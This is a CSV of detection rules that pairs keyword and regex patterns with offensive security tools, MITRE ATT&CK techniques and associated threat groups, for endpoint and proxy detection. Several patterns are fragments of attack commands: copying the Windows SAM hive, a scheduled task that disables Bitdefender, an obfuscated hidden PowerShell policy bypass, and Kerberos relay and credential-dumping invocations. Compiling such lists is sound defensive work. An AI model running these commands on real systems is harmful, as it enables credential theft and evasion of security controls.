"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at","metadata_entry_id"
"* - Antichat Shell*",".{0,1000}\s\-\sAntichat\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1"
"* - Bypassing UAC with SSPI Datagram Contexts*",".{0,1000}\s\-\sBypassing\sUAC\swith\sSSPI\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#content","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","2"
"* - c99madshell*",".{0,1000}\s\-\sc99madshell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","3"
"* - Cracked by Meth.exe*",".{0,1000}\s\-\sCracked\sby\sMeth\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#content","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","4"
"* - delete: Delete a scheduled task. Requires restarting the *",".{0,1000}\s\-\sdelete\:\sDelete\sa\sscheduled\stask\.\sRequires\srestarting\sthe\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#content","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","5"
"* - Dump LSASS memory bypassing countermeasures*",".{0,1000}\s\-\sDump\sLSASS\smemory\sbypassing\scountermeasures.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","6"
"* - FaTaL Shell v1.0*",".{0,1000}\s\-\sFaTaL\sShell\sv1\.0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7"
"* - KingDefacer*",".{0,1000}\s\-\sKingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8"
"* - Locus7Shell*",".{0,1000}\s\-\sLocus7Shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9"
"* - Remote lsass dump reader*",".{0,1000}\s\-\sRemote\slsass\sdump\sreader.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#content","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10"
"* - Removed disabled accounts from spraying*",".{0,1000}\s\-\sRemoved\sdisabled\saccounts\sfrom\sspraying.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","#content","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","11"
"* - Sensitive Accounts.csv*",".{0,1000}\s\-\sSensitive\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","12"
"* - ShadowSpray*",".{0,1000}\s\-\sShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13"
"* - Storm7Shell*",".{0,1000}\s\-\sStorm7Shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14"
"* ""Sniffy boi sniffin""*",".{0,1000}\s\""Sniffy\sboi\ssniffin\"".{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","#content","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","15"
"* $exploit_oneliner*",".{0,1000}\s\$exploit_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","17"
"* $FodHelperPath*",".{0,1000}\s\$FodHelperPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","18"
"* $KerbDump*",".{0,1000}\s\$KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19"
"* $lse_find_opts *",".{0,1000}\s\$lse_find_opts\s.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","20"
"* $payload_oneliner *",".{0,1000}\s\$payload_oneliner\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","21"
"* ./sf.py -l 127.0.0.1:5001*",".{0,1000}\s\.\/sf\.py\s\-l\s127\.0\.0\.1\:5001.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","26"
"* ./tor.keyring *",".{0,1000}\s\.\/tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","27"
"* .\tor.keyring *",".{0,1000}\s\.\\tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","28"
"* .beacon_keys -*",".{0,1000}\s\.beacon_keys\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","29"
"* .exe -addgroupmember -victim * -target *",".{0,1000}\s\.exe\s\-addgroupmember\s\-victim\s.{0,1000}\s\-target\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30"
"* .exe -chp -victim * -target *",".{0,1000}\s\.exe\s\-chp\s\-victim\s.{0,1000}\s\-target\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","31"
"* .exe -laps -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-laps\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","32"
"* .exe -ldapwhoami -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-ldapwhoami\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","33"
"* .exe -rbcd -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-rbcd\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","34"
"* /.exegol/*",".{0,1000}\s\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35"
"* /altservice:ldap *",".{0,1000}\s\/altservice\:ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","36"
"* /asrepkey*",".{0,1000}\s\/asrepkey.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","37"
"* /c copy *\windows\system32\config\SAM*",".{0,1000}\s\/c\scopy\s.{0,1000}\\windows\\system32\\config\\SAM.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40"
"* /c PoWErSheLl -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA *",".{0,1000}\s\/c\sPoWErSheLl\s\-nopROfi\s\-EXe\sbyPAsS\s\-wiNDOwsTy\sHIDdEN\s\-cOMMA\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","43"
"* /changentlm* /user:* /oldhash:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","46"
"* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47"
"* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","48"
"* /cmdtech:* /cmd:* /impuser:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/impuser\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","49"
"* /cmdtech:* /cmd:* /query:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/query\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","50"
"* /Create /SC ONCE /TN 'DisableBitdefender-*",".{0,1000}\s\/Create\s\/SC\sONCE\s\/TN\s\'DisableBitdefender\-.{0,1000}","offensive_tool_keyword","Dispossessor","scheduled task used by Dispossessor ransomware group to disabled AV","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#scheduledtask","N/A","10","10","N/A","N/A","N/A","N/A","53"
"* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*",".{0,1000}\s\/create\s\/tn\sNotion\s\/tr\s\\.{0,1000}cmd\.exe.{0,1000}\s\-c\s.{0,1000}\\.{0,1000}\s\/sc\sonlogon\s\/ru\sSystem\\.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","55"
"* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57"
"* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","58"
"* /credpassword*",".{0,1000}\s\/credpassword.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","59"
